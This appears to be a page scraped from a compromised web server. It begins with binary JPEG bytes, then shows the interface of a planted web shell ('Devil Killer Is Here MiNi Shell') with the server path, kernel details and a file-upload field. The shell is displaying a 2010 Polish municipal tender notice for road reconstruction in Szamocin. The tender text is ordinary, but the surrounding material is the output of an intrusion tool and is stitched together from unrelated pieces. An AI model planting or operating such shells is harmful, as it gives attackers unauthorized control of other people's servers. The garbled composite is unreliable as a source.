JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100302/56672-N-2010.html

<p class="kh_header"><b>Szamocin: Przebudowa  gminnego układu   drogowego  w  Szamocinie</b><br>
<b>Numer ogłoszenia: 56672 - 2010; data zamieszczenia: 02.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szamocin , Pl. Wolności 19, 64-820 Szamocin, woj. wielkopolskie, tel. 067 2848003, faks 067 2848065.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szamocin.umig.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa  gminnego układu   drogowego  w  Szamocinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa gminnego układu drogowego w Szamocinie przewidzianą do realizacji na działkach nr  geodezyjny: 741/6, 743, 1093, 1097, 1161/2, 1112, 942, 1162/4, 1136, 1113/1.
      
OPIS PRZEDMIOTU ZAMÓWIENIA 

1. Przebudowana  zostanie  droga  na ulicach:  Margonińskiej,  Plac  Wolności, 19  Stycznia, Kościelnej, Nowej .  
Projektowana  długość przebudowywanych ulic   to  2450 m ,  szerokość  jezdni      -  5÷7  m  , nośność  100 KN/oś , klasa drogi  L .   Podstawowe  grupy  robót to : 
roboty  przygotowawcze, roboty  ziemne ,  roboty  nawierzchniowe, chodniki i   zjazdy,  roboty odwodnieniowe, organizacja  ruchu. 

2. Główne  elementy zadania. 
2.1. Rondo na połączeniu   ul.  Kościelnej i ul.  19  Stycznia  w  Szamocinie.   
       Przebudowa  chodników   - 1000,5  m2 .
2.2. Miejsca parkingowe - 73 stanowiska, w tym 5 dla samochodów osób 
       niepełnosprawnych . 
2.3. Przejścia  dla pieszych - 17 szt.    
2.4. Przebudowa  nawierzchni  z  wymianą krawężnika na ul. Plac Wolności, 
       Kościelnej, 19  Stycznia,  Nowej  o łącznej powierzchni 11705,3 m2
2.5.  Wjazdy  na  posesje  z  kostki   brukowej czerwonej  gr 8 cm o powierzchni  
        1171 m2. 
2.6. Odwodnienie ulic poprzez ułożenie ścieku  z kostki i  wykonanie  wpustów  
        ulicznych do  kolektora  deszczowego. 
2.7. Organizacja  ruchu -  oznakowanie wg nowego opracowanego projektu zmiany 
       organizacji  ruchu. 
3. Projektowana przebudowa polega na:
a) Plac Wolności:
Zmiana nawierzchni bitumicznej na nawierzchnię z kostki brukowej betonowej - Starobruk oraz dobudowa dwustronnych miejsc postojowych dla samochodów osobowych w ilości 40 stanowisk, w tym 5 dla samochodów osób niepełnosprawnych.
Zmiana nawierzchni na chodniku i zjazdach na posesje ze zużytej kostki brukowej betonowej na nową.

b) ul. Kościelna:
Wzmocnienie istniejącej nawierzchni bitumicznej poprzez ułożenie warstwy z betonu asfaltowego - nakładki.
Zmiana nawierzchni na chodniku i zjazdach na posesje z płyt chodnikowych na nawierzchnię z kostki brukowej betonowej wraz z wymianą krawężnika.
c) ul. 19 Stycznia:
Wzmocnienie istniejącej nawierzchni bitumicznej poprzez ułożenie warstwy z betonu asfaltowego - nakładki.
Zmiana nawierzchni na chodniku i zjazdach na posesje z płyt chodnikowych na nawierzchnię z kostki brukowej betonowej. wraz z wymianą krawężnika.
Zmiana nawierzchni z asfaltowej i gruntowej na nawierzchnię z kostki brukowej betonowej na istniejących miejscach parkingowych w rejonie szkoły. Ilość miejsc postojowych - 33 stanowiska.
d) ul. Nowa (na odcinku od ul. 19 Stycznia do ul. Kościelnej):
Wzmocnienie istniejącej nawierzchni bitumicznej poprzez ułożenie warstwy z betonu asfaltowego - nakładki.
Zmiana nawierzchni na chodniku i zjazdach na posesje z płyt chodnikowych na nawierzchnię z kostki brukowej betonowej wraz z wymianą krawężnika.
Zmiana nawierzchni na miejscach postojowych z bitumicznej na nawierzchnię z kostki brukowej betonowej.
e) ul. Nowa (na odcinku od ul. 19 Stycznia do ul. Nowej):
Zmiana przekroju ulicznego na ciąg pieszo - jezdny.
Wzmocnienie istniejącej nawierzchni bitumicznej poprzez ułożenie warstwy z betonu asfaltowego - nakładki.

Istniejące skrzyżowanie ulic 19 Stycznia i Kościelnej zmieniono na skrzyżowanie typu rondo o owalnej wyspie centralnej.
Zakres przebudowywanych ulic - dróg gminnych przedstawiono na rysunkach nr 2.1. - 2.3. - plany sytuacyjne.

4.  Niweleta.
Niwelety przebudowywanych ulic o nawierzchni asfaltowej nie zmieniono, jedynie podniesiono ja równolegle do istniejącej o 6 cm ze względu na wyrównanie i ułożenie warstwy wzmacniającej ścieralnej grubości 4 cm. Natomiast na Placu Wolności (projektowana nawierzchnia z kostki brukowej betonowej) istniejącą niweletę podniesiono o 12 cm wykorzystując istniejącą podbudowę z kruszywa łamanego po rozbiórce warstwy asfaltowej.
5.  Przekrój normalny.
Miejsce przekrojów normalnych na poszczególnych odcinkach przebudowywanych ulic pokazano na rysunkach nr 2.1. - 2.3. - plany sytuacyjne. Konstrukcje jezdni i chodników na poszczególnych przekrojach nr 1 - 16 przedstawiono na rysunkach nr 3.1. - 3.4. - przekroje normalne.
Wzmocnienie konstrukcji jezdni:
- wyrównanie masą mineralno - asfaltową 50 kg/m2  po uprzednim sfrezowaniu    
  części jezdni w celu nadania odpowiednich spadków poprzecznych tj. i = 2%,
- warstwa ścieralna grubości 4 cm betonu asfaltowego.
Konstrukcja chodnika:
- podsypka piaskowa grubości 5 cm w stosunku 1:4,
- kostka brukowa betonowa grubości 6 cm kolor szary.
Konstrukcja zjazdów na posesje:
- podbudowa grubości 15 cm z kruszywa łamanego stabilizowanego mechanicznie,
- podsypka cementowo - piaskowa 1:4 grubości 3 cm,
- kostka brukowa betonowa grubości 8 cm kolor czerwony.
Konstrukcja nawierzchni na miejscach postojowych (Plac Wolności):
- podsypka piaskowa grubości 20 cm,
- podbudowa grubości 23 cm z kruszywa łamanego stabilizowanego mechanicznie 
  (dolna podbudowa 15 cm, górna podbudowa 8 cm) wg PN-S-06102,
- podsypka cementowo - piaskowa 1:4 grubości 4 cm, 
- kostka brukowa betonowa Starobruk grubości 8 cm kolor melanż.
Konstrukcja nawierzchni na drodze manewrowej (Plac Wolności):
-	istniejąca podbudowa z kruszywa łamanego po zdjęcie warstwy asfaltowej
-	wyrównanie podbudowy kruszywem łamanym, średnia grubość warstwy 5 cm
-	podsypka cementowo - piaskowa 1:4 grubości 4 cm
-	kostka brukowa betonowa Starobruk grubości 8 cm kolor melanż
Konstrukcja nawierzchni na miejscach postojowych (ul. 19 Stycznia):
- podsypka piaskowa grubości 20 cm,
- podbudowa grubości 23 cm z kruszywa łamanego stabilizowanego 
  mechanicznie (dolna podbudowa 15 cm, górna podbudowa 8 cm) wg PN-S-06102,
- podsypka cementowo - piaskowa 1:4 grubości 4 cm,
- kostka brukowa betonowa grubości 8 cm kolor szary.

Konstrukcja nawierzchni na rondzie:
a) pierścień:
- warstwa odsączająca grubości 33 cm z piasku średniego,
- warstwa podbudowy zasadniczej grubości 22 cm z betonu cementowego B-20,
- warstwa wyrównawcza grubości 3 cm - podsypka cementowo - piaskowa 1:4,
- warstwa ścieralna grubości 10 cm z kostki granitowej 8/10,
b) jezdnia wokół ronda i na wlotach:
- warstwa odsączająca grubości 20 cm z piasku średniego,
- warstwy podbudowy dolnej i górnej grubości 15 + 5 cm z kruszywa łamanego 
  stabilizowanego mechanicznie,
- warstwa podbudowy zasadniczej grubości 7 cm z betonu asfaltowego,
- warstwa wiążąca grubości 6 cm z betonu asfaltowego,
- warstwa ścieralna grubości 5 cm z betonu asfaltowego,
c) wysepki wokół ronda:
- nasyp wysokości 50 cm z piasku średniego,
- warstwa podbudowy grubości 10 cm - podsypka cementowo - piaskowa 1:4,
- warstwa ścieralna grubości 8 cm z kostki brukowej betonowej koloru czerwonego.
Konstrukcję nawierzchni jezdni obramowano krawężnikiem betonowym 15x30 cm, a chodnika obrzeżem betonowym 6x20 cm. Konstrukcję nawierzchni na pierścieniu obramowano krawężnikiem trapezowym granitowym 15/21x30 cm. Wysepki wokół ronda obramowano krawężnikiem trapezowym betonowym koloru czerwonego 15/21x30.
Wyznaczenie miejsc postojowych na parkingach należy dokonać kostką brukową betonową koloru grafitowego.
W miejscach przejść dla pieszych i zjazdów na posesje krawężnik betonowy należy obniżyć do wysokości 2 cm ponad powierzchnię jezdni.
W celu nadania właściwych spadków poprzecznych na ulicach objętych wykonaniem wzmocnienia warstwą asfaltową powierzchnię istniejącej jezdni należy sfrezować od strony krawężników na szerokości 1,0 m.
6.  Odwodnienie.
Odprowadzenie wód opadowych z powierzchni jezdni odbywać się będzie grawitacyjnie poprzez nadane spadki poprzeczne do projektowanych ścieków przykrawężnikowych, skąd dalej woda będzie przekazywana do istniejących przebudowanych studzienek ściekowych. Przebudowa studzienek ściekowych polegać będzie na nieznacznej zmianie ich lokalizacji i zmianie studzienek betonowych na studzienki PVC d 400.
Wyjątek stanowić będzie odcinek początkowy ulicy Kościelnej i odcinek końcowy ulicy 19 Stycznia, gdzie dla prawidłowego odbioru wód opadowych zaprojektowano kolektor deszczowy z rur PVC d315 ze studzienkami rewizyjnymi PVC d 400, który włączono do istniejącej kanalizacji deszczowej. Nowe studzienki ściekowe przyjęto również z rur PVC d 400 i przykanaliki z rur PVC d 160.
Długość odcinków projektowanej kanalizacji deszczowej wynosi odpowiednio 117,5 m i 176,0 m.
Roboty ziemne - wykop pod kolektor należy prowadzić w szalunku z bali drewnianych.
Lokalizację urządzeń odwadniających przedstawiono na rysunkach nr 2.1. - 2.3. - plany sytuacyjne.
7.  Roboty ziemne.
Roboty ziemne sprowadzają się do wykonania koryta pod miejsca postojowe, zjazdy na posesje i rondo.
Warstwę humusu o grubości 5 cm z obsianiem mieszanką traw należy ułożyć w miejscach pokazanych na planie sytuacyjnym.
8.  Organizacja ruchu kołowego.
Docelową organizację ruchu kołowego przedstawiono na rysunkach nr 4.1. - 4.3.
Do oznakowania pionowego przyjęto znaki średnie, typ folii 1, a dla znaków A-7, B-2, B-20, D-6 folię odblaskową typu 2.
Znaki poziome P-10 przejście dla pieszych jako pasy białe na czerwonym tle z masy termoplastycznej do nakładania o grubości 3,0 mm. Na pozostałe oznakowanie poziome należy przyjąć farbę chemoutwardzalną o grubości warstwy 0,8 mm. 

9. Wykonanie kosztorysów powykonawczych, dokumentacji technicznej 
    powykonawczej. 
    dokumentacja geodezyjna (inwentaryzacją) wszystkich prac, zatwierdzoną przez 
    odpowiedni z uwagi na lokalizację robót urząd geodezji i kartografii - Powiatowy 
    Ośrodek Dokumentacji Geodezyjnej i Kartograficznej w Chodzieży, ul. Wiosny 
    Ludów l (cena za sporządzenie dokumentów powykonawczych powinna być 
    wkalkulowana w pozycje jednostkowe zawarte w kosztorysach ofertowych w/w 
    zadań).

Całość prac należy wykonać w oparciu o posiadane przez inwestora szczegółowe projekty budowlane/wykonawcze.
Nazwy własne, które pojawiają się w przedmiarach robót, określają minimalny standard jakościowy materiału lub urządzenia przyjętego do wyceny.
UWAGA: zaproponowane w ofercie elementy - materiały powinny być takie same lub równoważne i odpowiadać parametrom technicznym, funkcjonalnym i użytkowym narzuconym przez zamawiającego w przedmiarach i projekcie budowlanym.

Szczegółowy zakres rzeczowy robót do wykonania określają:
1) przedmiary (kosztorysy ofertowe) robót  
    wartości jednostkowych, wyszczególnionych w poszczególnych pozycjach robót 
    musi stanowić wartość końcową, zapisaną na druku oferty
2) projekt budowlany/wykonawczy obejmujący swoim zakresem   przedmiot 
    zamówienia i specyfikacja techniczna wykonania i odbioru robót ;  
    oryginał w wersji papierowej projektu technicznego jest do wglądu u 
    Zamawiającego,

Przedmiot   zamówienia   obejmuje   również   wszystkie   prace   i   obowiązki   wykonawcy wymienione we wzorze umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Informacja  dotycząca robót dodatkowych i zamówień   uzupełniających:
1. Jeżeli konieczność robót dodatkowych wynika z decyzji organów nadzoru 
    budowlanego lub jest następstwem błędów lub zaniedbań Wykonawcy, prace takie 
    zostaną wykonane  przez Wykonawcę bez dodatkowego wynagrodzenia - w   
    terminach wynikających z     wydanej decyzji i obowiązującej umowy.
2.W przypadku (konieczności) udzielenia dotychczasowemu wykonawcy robót 
   dodatkowych nieobjętych zamówieniem podstawowym maj ą zastosowanie 
   przepisy art. 67. ust. l, pkt 5 PZP. Wykonawca takich prac zobowiązany jest 
   wykonać je przy zachowaniu tych samych  stawek kalkulacyjnych, norm, 
   parametrów i standardów, po podpisaniu przez obie strony 
    umowy ustalającej zakres rzeczowy, finansowy i termin wykonania.
3.Wynagrodzenie za roboty, o których mowa w ust.2 będzie ustalone kosztorysem 
    powykonawczym potwierdzonym przez Zamawiającego i Inspektora Nadzoru.
4. Zamawiający dopuszcza w okresie 3 lat od podpisania umowy, udzielenia 
    niezbędnego, uzasadnionego zamówienia uzupełniającego, zgodnie z przepisami 
    zapisanymi w art. 41, 
    pkt. 15 i art. 67 ust. l pkt 6 i 7 ustawy PZP. 
     
   Określa się wartość zamówienia uzupełniającego do 50% wartości umowy 
    podstawowej.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.21.30-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium  20000 zł
(słownie: dwadzieściatysięcyzłotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy  załączyć   kopie  uprawnień do  wykonywania   okeślonej   dziłalności , jeżeli  przepisy   prawa  nakłądaja taki  obowiązek ich posiadania.
Opis dokonywania oceny spełniania warunków udziału w postępowaniu Zamawiający oceni  zgodnie z formułą (spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- tj. realizowali w ciągu ostatnich 5 lat co najmniej 1 zamówienie odpowiadające swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączenia dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Za robotę budowlaną o podobnym zakresie i wartości zamawiający uzna budowę, przebudowę lub rozbudowę drogi o  nawierzchni  asfaltowej i  brukowej z  elementami odwodnienia, o wartości minimum 3 000 000,00zł złotych brutto, udokumentowana referencjami  i   kopią  protokołu bezusterkowego  odbioru. 
W celu potwierdzenia powyższego warunku Wykonawca zobowiązany jest przedłożyć wykaz wykonanych robót zgodnie z załącznikiem nr 4 do SIWZ.
Opis dokonywania oceny spełniania warunków udziału w postępowaniu Zamawiający oceni  zgodnie z formułą (spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- jeśli dysponują sprzętem budowlanym, środkami transportu i urządzeniami technicznymi  w ilościach i o parametrach niezbędnych do realizacji zamówienia,  zgodnie z nakładami kosztorysu ofertowego, projektem budowlanym i  harmonogramem rzeczowo-finansowym oraz podadzą informację o podstawie do dysponowania tymi zasobami lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego.   Przez niezbędny potencjał sprzętowy należy rozumieć dysponowanie przez Wykonawcę co najmniej następującym sprzętem budowlanym, środkami transportu i urządzeniami wymienionymi w poniższej tabeli:

Lp.	Wyszczególnienie	Minimalna liczba jednostek
1	Wytwórnia masy bitumicznej	1 szt.
2	Rozkładarka mas bitumicznych	1 szt.
3	Walce samojezdne stalowe gładkie	2 szt.
4	Walec samojezdny ogumiony	1 szt.
5	Równiarka	1 szt.
6	Koparki i/lub koparko-ładowarki	2 szt.
7	Frezarka drogowa do frezowania nawierzchni asfaltowych	1 szt.
Opis dokonywania oceny spełniania warunków udziału w postępowaniu Zamawiający oceni  zgodnie z formułą (spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponują lub będą dysponować osobą pełniącą funkcję kierownika budowy posiadającą (posiadającymi) uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994r Prawo budowlane (t.j. Dz.U z 2006r nr 156, poz.1118 ze zm. ) do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej w zakresie wymaganym do realizacji zadania.
W celu potwierdzenia powyższego warunku Wykonawca zobowiązany jest przedłożyć wykaz osób zgodnie z załącznikiem nr 5 do SIWZ Potencjał kadrowy i załączyć kserokopie uprawnień oraz zaświadczenia o przynależności do Okręgowej Izby Inżynierów Budownictwa lub innej izby samorządu zawodowego oraz informacje o podstawie dysponowania tymi osobami. 
Opis dokonywania oceny spełniania warunków udziału w postępowaniu Zamawiający oceni  zgodnie z formułą (spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- jeśli posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na co najmniej sumę ubezpieczenia  1 000 000,00zł.
Opis dokonywania oceny spełniania warunków udziału w postępowaniu Zamawiający oceni  zgodnie z formułą (spełnia - nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

